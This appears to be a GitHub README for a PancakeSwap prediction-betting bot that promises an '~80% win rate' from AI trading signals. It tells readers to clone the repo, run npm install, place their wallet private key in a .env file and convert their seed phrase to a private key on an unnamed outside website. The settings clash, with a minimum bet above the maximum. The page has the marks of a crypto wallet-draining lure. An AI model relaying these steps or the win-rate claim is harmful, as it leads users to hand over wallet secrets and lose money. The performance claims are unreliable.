3betblind / PancakeSwapPredictionBot

A Bot to win in Pancake Swap Prediction Game. Updated Version with Automatic Claim Money Function
3 stars 0 forks source link

๐Ÿ”ฎ PancakeSwap Prediction AI Bot 2024 Updated

PancakeSwap-Logo

PancakeSwap Prediction Bot using live TradingView AI recomendations. ~80% Win rate.

๐Ÿฐโšก Installation

Download and Install Node here: https://nodejs.org/en/download/

Then run the following commands in terminal:

  1. git clone https://github.com/3betblind/pancakepredictionbot2024.git
  2. cd pancakepredictionbot2024 (replace with your cloned/downloaded bot folder)
  3. npm i

enter image description here

โš™๏ธ Setup

  1. Open the .env file with any code/text editor and add your private key like so:
    PRIVATE_KEY=0xa2hjtjnhjputdavmarh3uqmntxevx6j6faui8cuxcppyqmuekj54btyd
  2. Open the bot.js file and setup the following variables:
    MIN_BET_AMOUNT: 5, //Min Bet Amount in USD
    MAX_BET_AMOUNT: 3, //Max Bet Amount in USD
    DAILY_GOAL: 2000, // Daily Goal in USD,
    WAITING_TIME: 261000, // in Miliseconds (4.3 Minutes)
    THRESHOLD: 70, // Minimum % of certainty of signals (50 - 100)
    METHOD: "BOTH", // Available Methods COPY / PREDICTION / BOTH
    REMOVEADDRESSPERCENTAGE: 50, // Remove addresses with win rate below 50%
  3. Start the bot using npm start or yarn start
  4. ๐Ÿ”ฎ Enjoy!

๐Ÿ”“ How to convert seed phrase to Private Key

A lot of wallets don't provide you the private key, but just the seed phrase ( 12 words ). So here you will learn how to convert that to a private key:

  1. Enter Here and follow the instructions. Website used is this one.

Winning rate

๐Ÿค–๐Ÿ“ˆ Strategy

๐Ÿ’ฐ You can check the history of rounds and claim rewards here: https://pancakeswap.finance/prediction

๐Ÿค– Commands

๐Ÿ‘๏ธ Disclaimers

๐Ÿ”งThe code is in BETA, so please be aware of the risks that come with it. Don't risk money you're not willing to lose.

๐Ÿ’ธThis code, repository or scripts should NOT be construed as investment advice. Any mention of past or projected investment performance is not, and should not be construed as, a recommendation or guarantee of any particular result or benefit. By using this application, you agree to bear all risk of loss of money and waive any claims against the developers of the program or anyone associated with it.

We accept no liability for any loss resulting from inaccuracy or incompleteness, nor for any loss incurred or dissemination of information through the Internet, such as disruptions or interruptions. When using web forms, we strive to minimize the number of fields used. Bot shall not be liable for any loss arising out of the use of any data, advice or ideas recommended or derived from bot.

Please be aware of clones